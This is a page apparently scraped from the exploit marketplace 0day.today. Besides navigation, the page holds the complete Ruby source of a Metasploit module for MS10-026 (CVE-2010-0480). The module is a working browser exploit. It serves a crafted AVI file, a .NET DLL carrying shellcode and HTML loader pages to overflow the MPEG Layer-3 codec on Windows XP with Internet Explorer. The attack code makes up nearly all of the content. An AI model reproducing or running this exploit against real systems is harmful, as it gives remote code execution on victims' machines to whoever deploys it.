0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
## # $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow', 'Description' => %q{ This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0's so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control. }, 'Author' => [ 'Yamata Li', # Vulnerability Discovery 'Shahin Ramezany <shahin[at]abysssec.com', # Vulnerability Analysis and Exploit 'juan vazquez', # Metasploit module 'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 13555 $', 'References' => [ ['CVE', '2010-0480'], ['OSVDB', '63749'], ['BID', '39303'], ['MSB', 'MS10-026'], ['URL', 'http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'], ['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/'] ], 'Payload' => { 'Space' => 4000 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Targets' => [ # Target 0: Automatic # Tested with: # Windows XP SP3 English IE 6 # Windows XP SP3 English IE 7 # Windows XP SP3 English IE 8: The exploiting site must be a trusted # site to load the .NET control # .NET CLR required [ 'Windows XP SP3 Automatic', { 'Platform' => 'win', 'Ret' => 0x72000000 }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 13 2010')) end def exploit # Embed our payload in a .Net binary ibase = target.ret - 0x10000 shellcode = rand_text_alpha(target.ret - ibase - 0x2285) shellcode << payload.encoded #Use our own custom .Net binary, because we require a much bigger file #to land our payload at the right place opts = { :template => 'template_dotnetmem.dll', :text_offset => 0x1285, :text_max => 0x20000, :pack => 'a131072', :uuid_offset => 135816 } @dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts) # Load our AVI file path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0480.avi") f = File.open(path, "rb") @trigger = f.read(f.stat.size) f.close super end def on_request_uri(cli, request) agent = request['User-Agent'] case request['User-Agent'] when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/ when /Windows-Media-Player/ # AVI is requested by WMP else send_not_found(cli) print_error("#{cli.peerhost}:#{cli.peerport} - target not supported: #{agent}") return end if (request.uri =~ /\.html/i) avi_name = rand_text_alpha(4) avi_trigger = "" if ("/" == get_resource[-1,1]) avi_trigger = get_resource[0, get_resource.length - 1] else avi_trigger = get_resource end avi_trigger << "/#{avi_name}.avi" html = %Q|<html> <body> <OBJECT ID="MediaPlayer" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab# Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..." TYPE="application/x-oleobject" width="280" height="46"> <param name="fileName" value="#{avi_trigger}"> <param name="animationatStart" value="true"> <param name="transparentatStart" value="true"> <param name="autoStart" value="true"> <param name="showControls" value="true"> <param name="Volume" value="-300"> <embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="#{avi_trigger}" name="MediaPlayer" width=280 height=46 autostart=1 showcontrols=1 volume=-300> </embed> </OBJECT> </body> </html> | html = html.gsub(/^\t\t\t/, '') print_status("Sending trigger loader to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) elsif (request.uri =~ /\.avi$/i) print_status "Sending AVI trigger to #{cli.peerhost}:#{cli.peerport} ..." send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' }) return elsif (request.uri =~ /\.dll$/i) print_status "Sending DLL file to #{cli.peerhost}:#{cli.peerport} ..." send_response( cli, @dotnet_payload, { 'Content-Type' => 'application/x-msdownload', 'Connection' => 'close', 'Pragma' => 'no-cache' } ) return end html_name = rand_text_alpha(4) dll_uri = "" html_trigger = "" if ("/" == get_resource[-1,1]) dll_uri = get_resource[0, get_resource.length - 1] html_trigger = get_resource[0, get_resource.length - 1] else dll_uri = get_resource html_trigger = get_resource end dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll" js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>" html_trigger << "/#{html_name}.html" html = %Q|<html> <head> <script language="javascript"> function forward() { window.location = window.location + '#{html_trigger}'; } function start() { setTimeout("forward()", 2000); } </script> </head> <body onload="start()"> <object classid="#{dll_uri}#GenericControl"> <object> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) end end # 0day.today [2024-07-07] #